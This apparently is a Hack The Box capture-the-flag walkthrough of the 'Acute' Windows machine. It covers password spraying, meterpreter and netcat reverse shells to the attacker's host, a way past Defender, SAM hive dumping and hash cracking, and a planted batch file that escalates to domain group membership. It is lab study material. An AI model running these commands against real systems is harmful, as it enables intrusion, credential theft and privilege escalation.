âš¡

Acute

 
notion image
echo "10.129.232.128 acute.local atsserver.acute.local" >> /etc/hosts
python3 dirsearch.py -u https://atsserver.acute.local/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
notion image
notion image
Here is a link which downloads a .docx document
notion image
They are all unaccessible
notion image
take the name as record
Lois
notion image
Default password:
Password1!
notion image
dc_manage
notion image
notion image
At Description i see Acute-PC01 , which infers there is a new PC. Creator name FCastle gives a hint about username format.
notion image
Record those name, Lois Hopkins seems special since we found name Lois in previous document.
Aileen Wallace Charlotte Hall Evan Davies Ieuan Monks Joshua Morgan Lois Hopkins
found a page for Windows PowerShell Web Access
Try all extracted name and default password Password1! with computer name Acute-PC01 as possible
AWallace WAileen HCharlotte CHall EDavies DEvan IMonks MIeuan Joshua Morgan JMorgan MJoshua Lois Hopkins HLois LHopkins FCastle
successfully login by the credential of EDavies:Passowrd!
notion image
And i found that there are 2 other user folder: jmorgan , Natasha respectively.
notion image
continue on enumeration with default password on those 2 users.
Failed to login with default password Passowrd!
netstat -ano | findstr TCP
notion image
search on 5040 port, which i haven’t seen before
try chisel on port forwarding
./chisel server -p 12345 --reverse ./chisel.exe client 10.10.14.11:12345 R:5040:127.0.0.1:5040
notion image
accessed but no response
Back to web powershell enumeration
notion image
User jmorgan is inside administrator group
improve out shell control by uploading a msfvenom payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.11 LPORT=6666 -f exe -o reverse.exe
notion image
it’s blocked by windows defender
notion image
after enumeration, i found this path, which executes program without defender
notion image
get the reverse shell
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
notion image
notion image
172.16.22.1 seems the host machine
notion image
RDP session found
screenshare
Try to capture screenshot multiple times by using the screenshare . i found dynamic results of several captured screenshots.
notion image
 
notion image
retrieved a credential acute\imonks:w3_4R3_th3_f0rce.
upload runasCS.exe
./RunasCs.exe acute\imonks w3_4R3_th3_f0rce. "./reverse.exe"
not work
$pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $pass)
Invoke-Command -ScriptBlock { whoami } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\user.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
get the initial flag.
Invoke-Command -ScriptBlock { Get-Command } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
Invoke-Command -ScriptBlock { ls 'C:\program files' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
notion image
Invoke-Command -ScriptBlock { ls 'C:\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
no permission to access
Invoke-Command -ScriptBlock { type C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51' $passwd = $securepasswd | ConvertTo-SecureString $creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd) Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds
 
net localgroup administrators
notion image
 
Invoke-Command -ScriptBlock { ((cat C:\Users\imonks\Desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc64.exe -e cmd 10.10.14.5 6666') | sc -Path C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat C:\Users\imonks\Desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
Invoke-Command -ScriptBlock { C:\users\imonks\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
receive the shell from jmorgan
notion image
 
retrieve the password:
As a local administrator on Acute-PC01, jmorgan can create backups of the registry hives
reg save HKLM\sam sam.bak reg save HKLM\system sys.bak
copy them to C:Utils, then try to download by meterpreter
secretsdump.py -sam sam.bak -system sys.bak LOCAL
notion image
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740::: Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
┌─[root@htb-uzwpqxuk1h]─[/home/b3bop404/Desktop] └──╼ #cat hash | awk -F ':' '{print $4}' a29f7623fd11550def0192de9246f46b 31d6cfe0d16ae931b73c59d7e0c089c0 31d6cfe0d16ae931b73c59d7e0c089c0 24571eab88ac0e2dcef127b8e9ad4740 29ab86c5c4d2aab957763e5c1720486d
hashcat ./h /usr/share/wordlists/rockyou.txt
notion image
2 cracked
Administrator:Password@123
Guest:
Try existed user awallace with this password
$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass) Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
notion image
try to list keepmeon folder again(don’t have permission before)
Invoke-Command -ScriptBlock { ls '\program files\keepmeon' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
see a .bat file
Invoke-Command -ScriptBlock { type '\program files\keepmeon\keepmeon.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
Name dc_manage -Credential $cred REM This is run every 5 minutes. For Lois use ONLY @echo off for /R %%x in (*.bat) do ( if not "%%x" == "%~0" call "%%x" )
 
Invoke-Command -ScriptBlock { net group /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
notion image
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
 
notion image
Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
 
Invoke-Command -ScriptBlock { net group Site_Admin /domain } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
notion image
Invoke-Command -ScriptBlock { cat C:\users\administrator\desktop\root.txt } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
read root.txt
Â